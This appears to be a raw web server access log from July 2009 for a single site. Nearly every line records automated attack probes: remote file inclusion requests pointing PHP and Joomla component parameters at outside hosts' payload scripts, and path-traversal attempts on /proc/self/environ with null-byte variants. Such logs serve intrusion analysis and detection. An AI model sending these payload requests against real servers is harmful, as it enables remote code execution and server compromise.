91.195.124.16 - - [04/Jul/2009:16:50:41 -0700] "GET /errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.americanboyschoir.com"
91.195.124.16 - - [04/Jul/2009:16:50:41 -0700] "GET /logs/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.americanboyschoir.com"
91.195.124.16 - - [04/Jul/2009:16:50:41 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.americanboyschoir.com"
91.195.124.16 - - [04/Jul/2009:16:50:41 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.americanboyschoir.com"
91.195.124.16 - - [04/Jul/2009:16:50:41 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.americanboyschoir.com"
91.195.124.16 - - [04/Jul/2009:16:50:42 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.americanboyschoir.com"
91.195.124.16 - - [04/Jul/2009:16:50:42 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.americanboyschoir.com"
91.195.124.16 - - [04/Jul/2009:16:50:42 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:16:54:49 -0700] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:16:54:49 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:16:54:49 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:16:54:49 -0700] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:16:54:49 -0700] "GET /logs/access.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:16:54:49 -0700] "GET /logs/access.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
91.195.124.16 - - [04/Jul/2009:17:01:44 -0700] "GET /logs/access_090622.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.americanboyschoir.com"
91.195.124.16 - - [04/Jul/2009:17:01:44 -0700] "GET /logs/access_090622.log/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.americanboyschoir.com"
91.195.124.16 - - [04/Jul/2009:17:01:45 -0700] "GET /logs/access_090622.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.americanboyschoir.com"
91.195.124.16 - - [04/Jul/2009:17:01:45 -0700] "GET /logs/access_090622.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:17:01:48 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:17:01:48 -0700] "GET /include/admin.lib.inc.php?site_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:17:01:48 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:17:01:49 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:17:01:49 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:17:01:49 -0700] "GET /include/admin.lib.inc.php?site_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:17:03:25 -0700] "GET /logs/access.log%20%20//include/admin.lib.inc.php?site_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:17:03:33 -0700] "GET /logs/access.log%20%20//include/admin.lib.inc.php?site_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
77.221.130.19 - - [04/Jul/2009:17:05:40 -0700] "GET /standard//3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.oalcs.org/school/pages/about/about?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:17:07:42 -0700] "GET /logs/access_090629.log//include/admin.lib.inc.php?site_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
116.121.201.73 - - [04/Jul/2009:17:07:45 -0700] "GET /logs/access_090626.log%20%20//modules/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
116.121.201.73 - - [04/Jul/2009:17:07:45 -0700] "GET /modules/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
116.121.201.73 - - [04/Jul/2009:17:07:45 -0700] "GET /logs//modules/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:17:07:50 -0700] "GET /logs/access_090629.log//include/admin.lib.inc.php?site_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
116.121.201.73 - - [04/Jul/2009:17:08:01 -0700] "GET /modules/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
116.121.201.73 - - [04/Jul/2009:17:08:01 -0700] "GET /logs//modules/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
116.121.201.73 - - [04/Jul/2009:17:08:01 -0700] "GET /logs/access_090626.log%20%20//modules/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
116.121.201.73 - - [04/Jul/2009:17:11:29 -0700] "GET /logs/access_090626.log//modules/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
116.121.201.73 - - [04/Jul/2009:17:11:52 -0700] "GET /logs/access_090626.log//modules/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
77.221.130.19 - - [04/Jul/2009:17:12:00 -0700] "GET /logs/access.log//standard//3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.prismed.net/loaded61a/images/htaccess/hold?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
77.221.130.19 - - [04/Jul/2009:17:12:00 -0700] "GET /standard//3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.prismed.net/loaded61a/images/htaccess/hold?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
77.221.130.19 - - [04/Jul/2009:17:12:01 -0700] "GET /logs//standard//3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.prismed.net/loaded61a/images/htaccess/hold?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
84.207.17.120 - - [04/Jul/2009:17:15:45 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
84.207.17.120 - - [04/Jul/2009:17:15:45 -0700] "GET /logs/access_090528.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
84.207.17.120 - - [04/Jul/2009:17:15:45 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
84.207.17.120 - - [04/Jul/2009:17:15:47 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
84.207.17.120 - - [04/Jul/2009:17:15:47 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
84.207.17.120 - - [04/Jul/2009:17:15:47 -0700] "GET /logs/access_090528.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
209.51.133.202 - - [04/Jul/2009:17:16:50 -0700] "GET /logs/access_090626.log%20%20/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
209.51.133.202 - - [04/Jul/2009:17:16:50 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
209.51.133.202 - - [04/Jul/2009:17:16:51 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
209.51.133.202 - - [04/Jul/2009:17:17:03 -0700] "GET /logs/access.log%20%20/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
122.153.28.140 - - [04/Jul/2009:17:17:36 -0700] "GET /logs/errors.php?error=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
122.153.28.140 - - [04/Jul/2009:17:17:41 -0700] "GET /logs/access.log/errors.php?error=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
122.153.28.140 - - [04/Jul/2009:17:17:41 -0700] "GET /errors.php?error=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
190.144.44.36 - - [04/Jul/2009:17:19:57 -0700] "GET /logs/access.log/index.php?sourcedir=http://www.drumzine.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
190.144.44.36 - - [04/Jul/2009:17:19:57 -0700] "GET /index.php?sourcedir=http://www.drumzine.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
190.144.44.36 - - [04/Jul/2009:17:19:57 -0700] "GET /logs/index.php?sourcedir=http://www.drumzine.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
122.153.28.140 - - [04/Jul/2009:17:22:26 -0700] "GET /logs/errors.php?error=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
122.153.28.140 - - [04/Jul/2009:17:22:26 -0700] "GET /logs/access.log/errors.php?error=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
122.153.28.140 - - [04/Jul/2009:17:22:26 -0700] "GET /errors.php?error=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.161.198.16 - - [04/Jul/2009:17:22:39 -0700] "GET /logs/home.php?pagina=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.americanboyschoir.com"
67.161.198.16 - - [04/Jul/2009:17:22:40 -0700] "GET /logs/home.php?pagina=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.americanboyschoir.com"
67.161.198.16 - - [04/Jul/2009:17:22:44 -0700] "GET /home.php?pagina=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.americanboyschoir.com"
67.161.198.16 - - [04/Jul/2009:17:22:45 -0700] "GET /home.php?pagina=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.americanboyschoir.com"
84.207.17.120 - - [04/Jul/2009:17:25:28 -0700] "GET /logs/access_090528.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
84.207.17.120 - - [04/Jul/2009:17:25:35 -0700] "GET /logs/access_090528.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
84.207.17.120 - - [04/Jul/2009:17:27:29 -0700] "GET /logs/access_090409.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
84.207.17.120 - - [04/Jul/2009:17:27:40 -0700] "GET /logs/access_090409.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
209.51.133.202 - - [04/Jul/2009:17:28:22 -0700] "GET /logs/access_090626.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
209.51.133.202 - - [04/Jul/2009:17:28:22 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
209.51.133.202 - - [04/Jul/2009:17:28:22 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
116.121.201.73 - - [04/Jul/2009:17:28:29 -0700] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
116.121.201.73 - - [04/Jul/2009:17:28:29 -0700] "GET /logs/access.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
116.121.201.73 - - [04/Jul/2009:17:28:29 -0700] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
209.51.133.202 - - [04/Jul/2009:17:30:00 -0700] "GET /logs/access_090612.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
116.121.201.73 - - [04/Jul/2009:17:30:57 -0700] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
116.121.201.73 - - [04/Jul/2009:17:30:57 -0700] "GET /logs/access.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
116.121.201.73 - - [04/Jul/2009:17:30:58 -0700] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
116.121.201.73 - - [04/Jul/2009:17:32:10 -0700] "GET /logs/access.log%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
116.121.201.73 - - [04/Jul/2009:17:34:08 -0700] "GET /logs/access.log%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
209.51.133.202 - - [04/Jul/2009:17:34:13 -0700] "GET /logs/access_090626.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
84.207.17.120 - - [04/Jul/2009:17:34:28 -0700] "GET /config/dbutil.bck.php?confdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
84.207.17.120 - - [04/Jul/2009:17:34:28 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
84.207.17.120 - - [04/Jul/2009:17:34:28 -0700] "GET /logs/access_090414.log//config/dbutil.bck.php?confdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
84.207.17.120 - - [04/Jul/2009:17:34:30 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
84.207.17.120 - - [04/Jul/2009:17:34:30 -0700] "GET /config/dbutil.bck.php?confdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
84.207.17.120 - - [04/Jul/2009:17:34:30 -0700] "GET /logs/access_090414.log//config/dbutil.bck.php?confdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
216.40.223.18 - - [04/Jul/2009:17:35:45 -0700] "HEAD / HTTP/1.1" 200 0 "-" "-" "www.americanboyschoir.com"
116.121.201.73 - - [04/Jul/2009:17:37:17 -0700] "GET /logs/access_090528.log%20%20/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
116.121.201.73 - - [04/Jul/2009:17:37:17 -0700] "GET /errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
116.121.201.73 - - [04/Jul/2009:17:37:17 -0700] "GET /logs/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
84.207.17.120 - - [04/Jul/2009:17:37:34 -0700] "GET /logs/access_090414.log%20%20//config/dbutil.bck.php?confdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
84.207.17.120 - - [04/Jul/2009:17:37:44 -0700] "GET /logs/access_090622.log%20%20//config/dbutil.bck.php?confdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
116.121.201.73 - - [04/Jul/2009:17:37:45 -0700] "GET /errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
116.121.201.73 - - [04/Jul/2009:17:37:45 -0700] "GET /logs/access_090528.log%20%20/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
116.121.201.73 - - [04/Jul/2009:17:37:45 -0700] "GET /logs/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
84.207.17.120 - - [04/Jul/2009:17:37:46 -0700] "GET /logs/access_090414.log%20%20//config/dbutil.bck.php?confdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
84.207.17.120 - - [04/Jul/2009:17:37:55 -0700] "GET /logs/access_090622.log%20%20//config/dbutil.bck.php?confdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
116.121.201.73 - - [04/Jul/2009:17:39:30 -0700] "GET /logs/access_090626.log%20%20/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.230.156.161 - - [04/Jul/2009:17:39:31 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.230.156.161 - - [04/Jul/2009:17:39:31 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.230.156.161 - - [04/Jul/2009:17:39:31 -0700] "GET /logs/access_090517.log//admin/business_inc/saveserver.php?thisdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
116.121.201.73 - - [04/Jul/2009:17:39:57 -0700] "GET /logs/access_090626.log%20%20/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.230.156.161 - - [04/Jul/2009:17:40:42 -0700] "GET /logs/access_090528.log//admin/business_inc/saveserver.php?thisdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
84.207.17.120 - - [04/Jul/2009:17:41:01 -0700] "GET /logs/access_090626.log//config/dbutil.bck.php?confdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
84.207.17.120 - - [04/Jul/2009:17:41:01 -0700] "GET /logs/access_090629.log//config/dbutil.bck.php?confdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
84.207.17.120 - - [04/Jul/2009:17:41:09 -0700] "GET /logs/access_090626.log//config/dbutil.bck.php?confdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
84.207.17.120 - - [04/Jul/2009:17:41:09 -0700] "GET /logs/access_090629.log//config/dbutil.bck.php?confdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.230.156.161 - - [04/Jul/2009:17:43:05 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.230.156.161 - - [04/Jul/2009:17:43:05 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.230.156.161 - - [04/Jul/2009:17:43:05 -0700] "GET /logs/access_090517.log//admin/business_inc/saveserver.php?thisdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.71.241.146 - - [04/Jul/2009:17:43:16 -0700] "GET /?path%5Bdocroot%5D=http://hbulonline.com/v7id.txt??? HTTP/1.1" 200 1724 "-" "libwww-perl/5.811" "www.americanboyschoir.com"
66.71.241.146 - - [04/Jul/2009:17:43:16 -0700] "GET /logs/access_090517.log//?path%5Bdocroot%5D=http://hbulonline.com/v7id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.americanboyschoir.com"
66.71.241.146 - - [04/Jul/2009:17:43:16 -0700] "GET /logs//?path%5Bdocroot%5D=http://hbulonline.com/v7id.txt??? HTTP/1.1" 200 1086 "-" "libwww-perl/5.811" "www.americanboyschoir.com"
